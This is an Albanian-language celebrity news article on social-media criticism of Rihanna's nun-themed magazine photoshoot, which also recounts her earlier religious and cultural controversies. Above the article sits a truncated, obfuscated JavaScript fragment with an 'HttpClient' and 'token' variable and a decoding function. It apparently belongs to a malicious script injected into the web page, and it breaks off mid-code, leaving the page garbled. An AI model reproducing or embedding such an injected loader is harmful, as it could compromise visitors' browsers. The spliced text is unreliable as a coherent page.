;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

‘Tallje fetare,’ ndezet rrjeti pas fotove të Rihannas si murgeshë

By

Rihanna ka ndezur sërish rrjetin, këtë herë me një fotosesion ku shfaqet e veshur si murgeshë.

Ndonëse nuk ka qenë aq fotografia e veshur si murgeshë që ka shkaktuar zemërim, por pozat ‘joshëse’ të këngëtares që e shohin atë duke hequr këmishën me kopsa për të zbuluar tatuazhin e gjoksit.

Këngëtarja, e cila pozoi për kopertinën  e fundit të ‘Interview Magazine’, u akuzua për ‘seksualizimin’ e murgeshave dhe mosrespektimin e rendit fetar. Fotot dhe videoja e yllit 36-vjeçar, tërhoqën kritika të ashpra nga përdoruesit e mediave sociale, të cilët i shihnin imazhet si ofenduese për të krishterët dhe katolikët.

Në përgjigje të fotove, komentet vërshuan në platformat e rrjeteve sociale të Rihannës, ku shumë u shprehën të zhgënjyer. Një përdorues e dënoi xhirimin si ‘tallje fetare’, ndërsa të tjerë pyetën pse Rihanna zgjodhi të ‘tallte një fe’ me zgjedhjet e saj të modës. Pavarësisht reagimit të ashpër, disa nga ndjekësit e Rihanna-s dolën në mbrojtje të saj, duke e krahasuar situatën me individët që vishen si ‘murgesha të përdala’ për Halloween dhe vënë në pikëpyetje qëndrueshmërinë e kritikave në raste të tilla. Ndërkohë, postimet në Twitter tregojnë se fotosesioni i saj ka shkaktuar një festë memesh, ku shumë prej tyre shkuan në Tik-Tok për të ndarë rikrijimin e tyre gazmor të imazheve.

Kjo nuk është hera e parë që Rihanna përballet me reagime ndaj pandjeshmërisë kulturore dhe fetare. Në vitin 2021, ajo u akuzua për ‘përvetësim kulturor’ pasi kishte veshur një varëse që përshkruante perëndinë hindu Ganesha në një foto topless. Përveç kësaj, në një incident të mëparshëm, ajo mori kritika për përdorimin e teksteve të shenjta islame në kolonën zanore të shfaqjes së saj të të brendshmeve Savage x Fenty. Rihanna, e njohur për shtyrjen e kufijve me zgjedhjet e saj të modës, shpeshherë i ka lënë përdoruesit e rrjetit me opinione të ndara. Paraqitja e saj në MET Gala 2018, e veshur me një ansambël të frymëzuar nga Papa, projektuar nga John Galliano, shkaktoi polemika, me disa që lavdëruan krijimtarinë, ndërsa të tjerë e goditën atë dhe e konsideruan fyese.

Artikuj të ngjashëm